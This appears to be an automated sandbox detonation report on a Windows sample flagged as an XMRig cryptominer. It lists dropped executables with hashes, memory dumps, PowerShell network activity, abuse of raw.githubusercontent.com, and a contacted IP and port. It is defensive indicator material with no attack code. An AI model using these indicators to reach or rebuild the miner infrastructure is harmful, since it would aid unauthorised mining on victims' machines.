C:\Windows\System\KgwHwZr.exe

C:\Windows\System\KgwHwZr.exe

C:\Windows\System\OGACeLk.exe

C:\Windows\System\OGACeLk.exe

C:\Windows\System\vFtrhfM.exe

C:\Windows\System\vFtrhfM.exe

C:\Windows\System\ElpHTQC.exe

C:\Windows\System\ElpHTQC.exe

C:\Windows\System\rEvcWGS.exe

C:\Windows\System\rEvcWGS.exe

C:\Windows\System\sGjqdiT.exe

C:\Windows\System\sGjqdiT.exe

C:\Windows\System\WILjEYu.exe

C:\Windows\System\WILjEYu.exe

C:\Windows\System\yQCSNYH.exe

C:\Windows\System\yQCSNYH.exe

C:\Windows\System\meWKIcf.exe

C:\Windows\System\meWKIcf.exe

C:\Windows\System\QjsyJFU.exe

C:\Windows\System\QjsyJFU.exe

C:\Windows\System\iSzSIGW.exe

C:\Windows\System\iSzSIGW.exe

C:\Windows\System\AzXHViB.exe

C:\Windows\System\AzXHViB.exe

C:\Windows\System\mLkrugn.exe

C:\Windows\System\mLkrugn.exe

C:\Windows\System\fOicXfd.exe

C:\Windows\System\fOicXfd.exe

C:\Windows\System\nVRVxDV.exe

C:\Windows\System\nVRVxDV.exe

C:\Windows\System\dloAivE.exe

C:\Windows\System\dloAivE.exe

C:\Windows\System\QylcUpF.exe

C:\Windows\System\QylcUpF.exe

C:\Windows\System\pAjFoCs.exe

C:\Windows\System\pAjFoCs.exe

C:\Windows\System\qsEoNNv.exe

C:\Windows\System\qsEoNNv.exe

C:\Windows\System\hpYSKRB.exe

C:\Windows\System\hpYSKRB.exe

C:\Windows\System\tKyMRhR.exe

C:\Windows\System\tKyMRhR.exe

C:\Windows\System\xsMISCH.exe

C:\Windows\System\xsMISCH.exe

C:\Windows\System\oRaQStC.exe

C:\Windows\System\oRaQStC.exe

C:\Windows\System\kwUCRRh.exe

C:\Windows\System\kwUCRRh.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2032-0-0x000000013F710000-0x000000013FB02000-memory.dmp

memory/2032-1-0x00000000003F0000-0x0000000000400000-memory.dmp

C:\Windows\system\GFhzKPQ.exe

MD5 8766e306c5761b279c28e657ddc31132
SHA1 f0b7404e643b805744237e59553c4b77719f3bea
SHA256 1f2e84aa36581ad101af8cd9371c11f3b91fe6b8c651a9b27d58a461e1925259
SHA512 34a66e41f40264ae1c87c46f318d361a5dfc4b17fb12f531de80ef696971023dbd7a0d8b78fbb331290fc64610a057d5bc1298ddfaf93d5f12d905de25fe3a58

memory/2096-8-0x000000013F550000-0x000000013F942000-memory.dmp

\Windows\system\wuKxtGb.exe

MD5 7dd9e8601c66f864bc2805e1f003e1ba
SHA1 b85cdd209fd794931a6dcbc9d98d66fe4705dc40
SHA256 7c7531b866ee3a284d68570a95966a1f2ab6972623c4e64293fd9ed624575c10
SHA512 a4cc68d2905ea420feb9ca03bbd78083a973a06d6fff7170bc3b7c44f4a2ce938214445cb9e1a3403b4a70639c0aed80abd2923c9ec8795d6033c80dc87792da

memory/2032-7-0x00000000025D0000-0x00000000029C2000-memory.dmp

memory/2032-10-0x000000013FE70000-0x0000000140262000-memory.dmp

memory/1672-16-0x000000013FE70000-0x0000000140262000-memory.dmp

\Windows\system\DpPffUU.exe

MD5 68c51f365693ab8645bd034452840f3c
SHA1 6b558db62fc03dd59e84b63d2ac68b0eb628229b
SHA256 3abb78f5f0886eb31965e3bc495d07a849e81bf95860a7f53c1faea792c9eb50
SHA512 674a67cb45ffea63bbeac9cac55fd567b10a970497e6fad40a493424cefb76d4e7d82d235da6b8359ca24f2cf27f75068b07aa3b335f40181a1abeddc144cd7f

C:\Windows\system\plwcVSe.exe

MD5 9ec4862abb49d047f532f6eed3aa6a38
SHA1 fd6abeb9729a8368b9bc351ab0f3b7ac0a1deed4
SHA256 637008f2ae6371815a2740826e45928eebc86430675b9949bec8a1e0c7672ea0
SHA512 4d9d55fb43932c3adaddb8c91e8a3deef7949583f87bc10bc13fee3931e801107ad71a55de5cd57a78d206687432e7c36cb94437108b05f71bb21fff8ca5d991

C:\Windows\system\jrJkBtR.exe

MD5 fe9c57f26bccbf38a2a5751381144898
SHA1 2ea9a366200d9438c8a5ac7c265c1459a6843cae
SHA256 64ccb012438e668780d269e2301d5ee6f8c244248d6eb0c23a33ac8d3802dd0f
SHA512 9add7e290f8da970b7a7cda6bc7280f8b765d08b9bd211cd0b3b22f9d4d97b619087ebb6d93389f66a1f14c57a82534cabf844838dcdec1837f8efa60a079f26

C:\Windows\system\ruJYdIw.exe

MD5 bf4c3ae97c6f2b5381b4bef318d17d5b
SHA1 d7ebb64bd43ff1077d67cac1133ed978d38163e8
SHA256 13656e6d8aeae0eee1162f92b09cf6fe4a4e06d7551a10af63ef147726c85b9f
SHA512 90b30b818a121201282a2d41d8dddec97e586d3fe0db246af799023850701cade5452f5a990d3c33eab33e655687300c40a9d28c4fc9cd1cf647a598834c1eb3

C:\Windows\system\AwKlfSe.exe

MD5 eccfd4ca2d406df6556e86f8e2414d72
SHA1 bd503fe3cd9adb9110f109df6fca0d9ff7aea8cf
SHA256 9beb79c8ef87e20029904e0bfc0d5b5f797ef59707e893bceecdd410739a9cf1
SHA512 2022fc010930792a815d7a2bb1c0dfff999b6d912f21e06435324d1b09eaad977f2b33cc8e32bd27a0d3192a4f02e79a93373c31c7d8909fc665d986455f6a7c

C:\Windows\system\LKiWKYZ.exe

MD5 2b14dcf4b7f4d6e1f02110ec6d6826f6
SHA1 8676c49bdfce7215bd81eb328ccf6aa2ac3a653e
SHA256 134ed0c6054e37563f28e45c62f23ea9d4c30c5751ae509749ebde218ab4778d
SHA512 d6a6a3edec22b6c9dab19c28ec8c8fbf048c7c6f06e0342d610f16d39f69413412e6e8fe9f333c10ae034da53e671a38160f75c1343e80a24facf372027d0ab4

C:\Windows\system\zQSJdBd.exe

MD5 cf91cbbbdb87490ef538b7ac8bffa1de
SHA1 983390bc580ef6fdd2b82f9233129e4286eae00c
SHA256 45ded76ea585cbd3dd1d0bcbf78f8fd96593cc363bdc986c2a32894a78d5f173
SHA512 deaba9ee2abd3d05d71fc9bd1fb75008f990b19d520e85ca6f1bc5811e8052d3b913f5b86af3884f88ea3f40022672ac1a0021aa43c523998019cde870a828ed

\Windows\system\wkgZIkI.exe

MD5 ed874a941e26b7d6c7c012a007aa272c
SHA1 216fbf096f7ae9ee51438e8595270850bf97057b
SHA256 fa9dfcf927d5826f9022771414e92020dac0bc057d94074276a92526636a7fd2
SHA512 4d4b4f0d383146d1b50ae632d97f62efb261ced907b0c9453753813a9e8934cf38890738f02e7f936f580dd2cfc5e4fc9496ff10bb502ba94a6d55451de6ab3c

\Windows\system\rqGwdKL.exe

MD5 cbe5b3de9d43658e05ac8c81b538ebde
SHA1 eedde8eacf0826fbc8db95ca23c30bdb48711567
SHA256 cbcec5d22f76cf4a64b6660a7cbbba4c8d75da8625266ccda5152f85c32f77c5
SHA512 43afaf7440f8ec3bb695dda3c6a61fb1e480728c2e725ae831c4d4bf7a35f984c047cc6fa26962bcf9169a5ef5b6a5242a44105742c5fcd0c082e93e040e229b

memory/2032-83-0x0000000002FC0000-0x00000000033B2000-memory.dmp

C:\Windows\system\TsGRgcF.exe

MD5 6c33249b6d55f8fa1896b47e2ef664f4
SHA1 0603081f79e65c137263b77aa3af89978c7e29fc
SHA256 646d1982cb02e412f09436716f07a2765ec3fc354cadc8911565f1ad5505c51a
SHA512 b7085915ace7997963ef4b5d3079ac7d484f19763ee34f8e8ea723e3a1ac6175f46684fbc1fc8157db568227c04a393f93588239e5a8466dcce881b99f5d7647

\Windows\system\ytXOYLM.exe

MD5 ec246944b4ba665a75ab7969b24a71d7
SHA1 4ee1c091156bc05e535df4467709014d90b96a2b
SHA256 6e3e24e215ed0182bae108524255f467b01ae5224199705618a7de049a7857a7
SHA512 de5ef436980ca8961b212938b0fc5bef1e123b2bd397a78556abd0fd49b478a52436897a832ac6595dffe62ee999bacf0a662589bd8f77bedd1622c4a00a11b1

\Windows\system\CfiMwCr.exe

MD5 8f915d38477478aaf4f6b8869ccab439
SHA1 d00181fa4006c0e4a16e04f12cd63d03d8bf6be1
SHA256 7646a2a858dc0f5b93ead4e45b2155932a99594b7ba13cf1aa3bdca7ace892e5
SHA512 a7a726bd597095d42c68c89d399ff54212a49b29c1f724ce8e10d7a9de417002d86fc4b355f347a023e125af5f27d9bb8ec1e228c6d393682904153037484161

C:\Windows\system\VHDshhB.exe

MD5 ff28f31ac848a74d5645da103223719f
SHA1 4a94b443b2ee319a56cfc31903cdac6f4c63a378
SHA256 dd08654128a821ceeeaa2689e97c79aef1117852484fcba6279063235c70396d
SHA512 cda8043ec9ee42c22e0bfebdd7c8e0426c26d03a76eb5eab313eda3cf76312bdcf649c658bd8ede080d44486f4ef892ae41ce471b1118148bcf7b82be42e2787

C:\Windows\system\CXcwdli.exe

MD5 f80bd9033fc999448206a4e76e40ec8e
SHA1 e4306a78e312ec164895cf4b42362a0b839768e1
SHA256 0ce8773e3a90a7bacc881f6d8894fa2ef2ccb4f95cd9b450bed935e94646f531
SHA512 7970b9162b4577110b141c957fb0c2b1e9d30b12a440e5009c40123120c0320876d348d374f37cac125a13af9b7aa7a3da1ba921ee6c7489e19bb5b3c008d23b

C:\Windows\system\HaHmNuE.exe

MD5 3c411313ea89e8ceb21947a993220926
SHA1 1bffd2b27721344b2eb1cb5511a950f74de56d14
SHA256 5b4a6bc4d9748e4d3f640781d45c9f1c79184b718a1bcabffc3b6cb8b5e77ecb
SHA512 6ef693cb356f566b5e4b67cb631167c6839e36ec38c79411ab9a05e8356c317879afbf1a6ea762d411bc5cb21cdcac2a735a15bf494610a0afefa2634a3d3d21

C:\Windows\system\HaaLWqY.exe

MD5 5fd4cf7270abb273c1edfc4e73e25cbf
SHA1 4a8a5ea8ce61a0df432c66441312861a97a27ee2
SHA256 0383800aae9a8dac0b5eb1ca0e07832ef97e97ba1c7622c5d34650ef93954b7c
SHA512 b44b0a7d4b8b7e8ad47061e736b006170387f3b1f0d33582fb7ab946f98b076a26483d72e8f5eaace9011f05f31e8d837170baf8f7003d78915818ae292514f9

C:\Windows\system\YIZgHEr.exe

MD5 22aa8df83bc00b936b27077a77294458
SHA1 4c92009c998e808d0ae6b54c69f1b4a0c94352da
SHA256 fd128cc4d1bdb31efd136547eb9b5b188aae5a08ae46fe0a1691b70390a9804b
SHA512 bd3bd66aa01268fd0bd93b9713d891eb7e3f076275316424d2bd90c009c59af654102d6b4bcbd9677afabec53458324909ca517c6f53c2c3deeeda6070b8e068

memory/2632-163-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2744-162-0x000000013F580000-0x000000013F972000-memory.dmp

memory/2032-161-0x0000000002FC0000-0x00000000033B2000-memory.dmp

memory/2168-160-0x000000013F840000-0x000000013FC32000-memory.dmp

memory/2032-159-0x0000000002FC0000-0x00000000033B2000-memory.dmp

memory/2768-158-0x000000013F2E0000-0x000000013F6D2000-memory.dmp

memory/2032-157-0x000000013F2E0000-0x000000013F6D2000-memory.dmp

memory/2712-156-0x000000013F830000-0x000000013FC22000-memory.dmp

memory/2032-155-0x0000000002FC0000-0x00000000033B2000-memory.dmp

memory/3024-154-0x000000013F030000-0x000000013F422000-memory.dmp

memory/2032-153-0x000000013F030000-0x000000013F422000-memory.dmp

memory/2808-152-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2032-151-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2600-147-0x000000013FB90000-0x000000013FF82000-memory.dmp

C:\Windows\system\aVtmRqF.exe

MD5 ba61a775631b5afa4c6786bf8b815a1b
SHA1 8f151819f670e40084aa936ca0a5705fc7b4da86
SHA256 584e6a045115c5fe96144a1bbf758590ede45e05185123465e6d29c87f78da7b
SHA512 6a93998897a46264c11723c53ed159cffdd12e63cba057bae6339e08c0ffcca7cc9ddc9f247a8ec0af47ac7cee0987d0abe9214a3db7ddc2292831b2da67deb0

C:\Windows\system\tesSRpq.exe

MD5 a8195bfd4a5aed5bcdeb5419fe4122ab
SHA1 e5f5927fc24015f47404454adc188e2734543a0f
SHA256 4f9e78e0b4c7dd69833a88c2b0e5471a59f51ef45e7401c58400c1412213c399
SHA512 c66d904f6c9a366844c1a9ea50da61709c3451808840aea7b486b042bf43cc1b8fbce718cb6ae60b2cd0c930cfcd4cf54539ebc759f08e6e8a032a9a3651a587

C:\Windows\system\NBmPsWh.exe

MD5 25c0a7dfb99a46aebc2311a5c0ba8d37
SHA1 8068766b13f3f2596437e102cdf51270ce727c4e
SHA256 e9338dd9b4966ef30902e53c25301aed6224030aa3655cb51252b4e25899d0eb
SHA512 d3dcefbcd33333730e5db39938b7408025bee9f1b437d6f6ace4451c6014ae9e70b5436381b9c2bd5d90f82e5184629afdbc0a373747bfa150f8bc0720fff699

C:\Windows\system\nqUUmlV.exe

MD5 cf752d8887f8179e3045ecbb0f366946
SHA1 c53683e58f887504ee154efd078448aef84c315d
SHA256 c0e260c50cf0aa0f01939948d10f05e648222b3b19f8729e5022333ba04d30e6
SHA512 fcc6d218271e16f3d0fa09b06a4eec0c6b9deeab3b227fe9318a3f61285b1996d2f3942fa4361afca594f298a89f1024c84700c950fa1cbdfa2b90a2ddfda459

C:\Windows\system\TwyXRgD.exe

MD5 8cc6adb926554484a1c02cf498a5af85
SHA1 35bb5c39f7a179c12b2b82a79995b247d4a956a3
SHA256 0399b1360fa89a10fe3a5412db605e698c34650198eea798bef0697bd690ac28
SHA512 d98726a7a89eab396c6d85a0bea032c38470babff353312b53ff8a91ca36a52c5e88af36d8c448d861eb1d2489407ca3ed725e63885d78df1bfd81e280a0d946

memory/2032-131-0x000000013FB90000-0x000000013FF82000-memory.dmp

memory/2856-130-0x000000013F850000-0x000000013FC42000-memory.dmp

\Windows\system\wtyCyRe.exe

MD5 2940c670fa67374b2a48f070690c9faf
SHA1 f0fb687c45039300bc74fbc0025c084778532b29
SHA256 2f42f9b40084394acc9db218d3aee46d81bf0fc771bcbb1f789432d7c96d616b
SHA512 b1e5b836aabf729a4a418db4017123dd2af3911f76ad51cf2e783ffe40fcd272cfea7aa8c7d4200861c58996cac1c0b59f5b8b185dc6d9105b1dfde65a80b829

memory/2776-180-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

memory/2032-86-0x0000000002FC0000-0x00000000033B2000-memory.dmp

memory/2032-85-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2584-84-0x000000013F520000-0x000000013F912000-memory.dmp

memory/2776-179-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

C:\Windows\system\fmKUmOe.exe

MD5 d0a6b9981019b612e8c5c51cf0abbee3
SHA1 c550958d461fc704a6ac3551500dd80a421f8a68
SHA256 f9a7d33db98671b3f6267d5bb9a1d64c4c802ceefc0ef4a5284f0510b6d74ca8
SHA512 9e5198eadfb81bbe4d39b41bce3d4286145fd431b2412adda570049dfd00ab6b233da92ab42664e60e60daa44fd6880a4c45c0115344020697f4f0f90f44a6db

C:\Windows\system\OdxGsxZ.exe

MD5 43afb9e25430d10663ed63539704e6ca
SHA1 56f93c2b07d8f6260123e3ee3c523a9648f66465
SHA256 f8d810f9d226aca02f78773167b5a1d64df774a99d4f9f5f8ffd11e071ed2a36
SHA512 2a54e92771f44c8b21b8ac10efb8deff7a057db9aaf884e2e6dda1b36183fb9e2d28ff985f0e6af424a594dbfb90db11915a96ec55f88076f81507694bbed098

C:\Windows\system\kYXAfdp.exe

MD5 3991f4ec2094af4e6a3c48cb948ec05b
SHA1 2be7e1b2e3e9155616280bedfaf6be902a1ca9bc
SHA256 a37379cf560ecc55db7cbd0e0bb4814c240aadc857ccf3a2eb17f0c3d15c8a44
SHA512 f9eafad8579d0fc18c27c26cecf2d74b5b08ac577044c0179d3c9239909fd6c72caee1794c9905605cb1281f7bf7d10f9889816e227d543807d6c823d067f58c

C:\Windows\system\esaXEeA.exe

MD5 08afd4f6a82d58dfe951be2d50e68f86
SHA1 4901ba830e374cfc5425205611e5ccab4c3b88fb
SHA256 db09eac1f9d7d866c2538017f2c0d85c84904e9a9450287699099c1f4106aa2b
SHA512 ff441c40959850c8ca19be0a9276bff21b3adcaf132f4bcf85395f1c1fafea3dd1990e81ccec2816d0cc3ad67627fa28973f93639ad52e1a611fb1c4711734e7

C:\Windows\system\PSBynoL.exe

MD5 794d79a9c782eaa81d28336a6c078dc3
SHA1 52e0c81cd237fd7a0e2b1ca8e4433c4316bca5bf
SHA256 ea9c8b6e2d40ddcce24a2ee5560a127c83acfef44ee2b5b40491da63f2a2db01
SHA512 7b4d37ed46e211a04751431f2e80d66cce36370ce35cd06224604b4c6e96cd62fd131f6fa75594bec50d3dfd7cb98d9c14d9c2ecc94197a0105cd991425af229

C:\Windows\system\KowXVJs.exe

MD5 547b213ec41afe6b981f4cfdabdada2c
SHA1 2ee3409a2b5b108ad45594f92dc6e5adf608239a
SHA256 5eb29b240e2d19ffcda834f861e02bb67c43a940ef4c6eae5150e4c5682b6b25
SHA512 76785e1af3b5308f734cdd0944d2f1f883f6dface6d52c614d2f0a460063ad13067308bb90562a75251421144696360671cbb476b30a396247ffbf54a44414d5

C:\Windows\system\qomRRQh.exe

MD5 c4a3744b469cd178f3e0214b675cdc6a
SHA1 ffcb152599e6fa4de88dc73c2167bcc394e11aa9
SHA256 9912e934c2245aa7c8e4f9d85bee0d94118b8be1b35b0b321e84baaf92f9f5f2
SHA512 42a388bbe2c70a9c3645c19faa4331fdbacfcb61f642ab293f11fd7822dce576066827b14a0894fb15c208cb9995750b7394b04ed410e1e993c8fced943b066e

C:\Windows\system\XIolwQx.exe

MD5 9d1d9eaf827aa5a8265f90e20be66c02
SHA1 2871346c116baddeb00800fe3a43fc791c455687
SHA256 8855953243aac9f1725c05c1e98d8982882a7f89ed355e3d7599d54b03641531
SHA512 bdd230389ea6d565524ec311d790b3559d35738562727ec3635616ae812a87c405b6a6e2c96ae66e7d676e828c12e4caf081629c5772967cf573f3b556f3f77d

memory/2032-1430-0x00000000025D0000-0x00000000029C2000-memory.dmp

memory/2096-4465-0x000000013F550000-0x000000013F942000-memory.dmp

memory/1672-4588-0x000000013FE70000-0x0000000140262000-memory.dmp

memory/2584-4593-0x000000013F520000-0x000000013F912000-memory.dmp

memory/2096-4595-0x000000013F550000-0x000000013F942000-memory.dmp

memory/2768-4718-0x000000013F2E0000-0x000000013F6D2000-memory.dmp

memory/2744-4715-0x000000013F580000-0x000000013F972000-memory.dmp

memory/3024-4712-0x000000013F030000-0x000000013F422000-memory.dmp

memory/2600-4791-0x000000013FB90000-0x000000013FF82000-memory.dmp

memory/2856-4693-0x000000013F850000-0x000000013FC42000-memory.dmp

memory/2168-4704-0x000000013F840000-0x000000013FC32000-memory.dmp

memory/2808-4697-0x000000013F080000-0x000000013F472000-memory.dmp

memory/2632-4829-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2032-10772-0x0000000002FC0000-0x00000000033B2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 09:37

Reported

2024-06-12 09:40

Platform

win10v2004-20240611-en

Max time kernel

112s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\WnVnaHp.exe N/A
N/A N/A C:\Windows\System\weaUVMN.exe N/A
N/A N/A C:\Windows\System\TfBQgnu.exe N/A
N/A N/A C:\Windows\System\bECuTmG.exe N/A
N/A N/A C:\Windows\System\flOsYXL.exe N/A
N/A N/A C:\Windows\System\ajLRbid.exe N/A
N/A N/A C:\Windows\System\EGDRlKX.exe N/A
N/A N/A C:\Windows\System\SiwaOlT.exe N/A
N/A N/A C:\Windows\System\tcMLHGp.exe N/A
N/A N/A C:\Windows\System\Tieqvxf.exe N/A
N/A N/A C:\Windows\System\KiBJKSd.exe N/A
N/A N/A C:\Windows\System\LaoOQzD.exe N/A
N/A N/A C:\Windows\System\ecFIALa.exe N/A
N/A N/A C:\Windows\System\SnQqwqi.exe N/A
N/A N/A C:\Windows\System\WfAaKga.exe N/A
N/A N/A C:\Windows\System\lbgnPWk.exe N/A
N/A N/A C:\Windows\System\PnTVvPl.exe N/A
N/A N/A C:\Windows\System\DQJnKAF.exe N/A
N/A N/A C:\Windows\System\fTZAIqa.exe N/A
N/A N/A C:\Windows\System\gZuEqpn.exe N/A
N/A N/A C:\Windows\System\KYMOnNP.exe N/A
N/A N/A C:\Windows\System\SSBFIdN.exe N/A
N/A N/A C:\Windows\System\OyIiRIE.exe N/A
N/A N/A C:\Windows\System\bJaBNnG.exe N/A
N/A N/A C:\Windows\System\jgkMQgR.exe N/A
N/A N/A C:\Windows\System\lCQbkxd.exe N/A
N/A N/A C:\Windows\System\JVDRIoK.exe N/A
N/A N/A C:\Windows\System\yhUDVQr.exe N/A
N/A N/A C:\Windows\System\BvUIybk.exe N/A
N/A N/A C:\Windows\System\GHFVUlj.exe N/A
N/A N/A C:\Windows\System\XeQfIXb.exe N/A
N/A N/A C:\Windows\System\VJeunQw.exe N/A
N/A N/A C:\Windows\System\BhmhpLH.exe N/A
N/A N/A C:\Windows\System\XXjYvUP.exe N/A
N/A N/A C:\Windows\System\DELMnBH.exe N/A
N/A N/A C:\Windows\System\UHWUAPA.exe N/A
N/A N/A C:\Windows\System\ASQntDS.exe N/A
N/A N/A C:\Windows\System\eSDrCTy.exe N/A
N/A N/A C:\Windows\System\vDmxQhz.exe N/A
N/A N/A C:\Windows\System\GsdqxiI.exe N/A
N/A N/A C:\Windows\System\KGcdzah.exe N/A
N/A N/A C:\Windows\System\iatEjSM.exe N/A
N/A N/A C:\Windows\System\mybQhoC.exe N/A
N/A N/A C:\Windows\System\lojdnzb.exe N/A
N/A N/A C:\Windows\System\doCOMtg.exe N/A
N/A N/A C:\Windows\System\ACKhOBF.exe N/A
N/A N/A C:\Windows\System\dBMAvYC.exe N/A
N/A N/A C:\Windows\System\dihvrhY.exe N/A
N/A N/A C:\Windows\System\MpmOYbs.exe N/A
N/A N/A C:\Windows\System\MsndRgr.exe N/A
N/A N/A C:\Windows\System\TtmegZA.exe N/A
N/A N/A C:\Windows\System\IwMuKCC.exe N/A
N/A N/A C:\Windows\System\RljABfK.exe N/A
N/A N/A C:\Windows\System\cgDuNmv.exe N/A
N/A N/A C:\Windows\System\oBlwrhK.exe N/A
N/A N/A C:\Windows\System\OXVQUUQ.exe N/A
N/A N/A C:\Windows\System\wJkuAAc.exe N/A
N/A N/A C:\Windows\System\NJXmSvt.exe N/A
N/A N/A C:\Windows\System\uiAGBcq.exe N/A
N/A N/A C:\Windows\System\bXjqmUb.exe N/A
N/A N/A C:\Windows\System\KTBjlCq.exe N/A
N/A N/A C:\Windows\System\ilimmOT.exe N/A
N/A N/A C:\Windows\System\wTpJfPE.exe N/A
N/A N/A C:\Windows\System\goweHgT.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ZnFaqnm.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\JpiNxRV.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\cLCLClM.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\pEyoIrk.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\TBrDgbN.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\hWfBJne.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\lnoxcvO.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\MqohKoE.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\bbceVIO.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\MFWGvsy.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\koaPjKS.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\AnPrtfs.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\mJHxlEs.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\KGcdzah.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\TGhJLIh.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\iaKkcUr.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\teghOLF.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\VKWoCsM.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
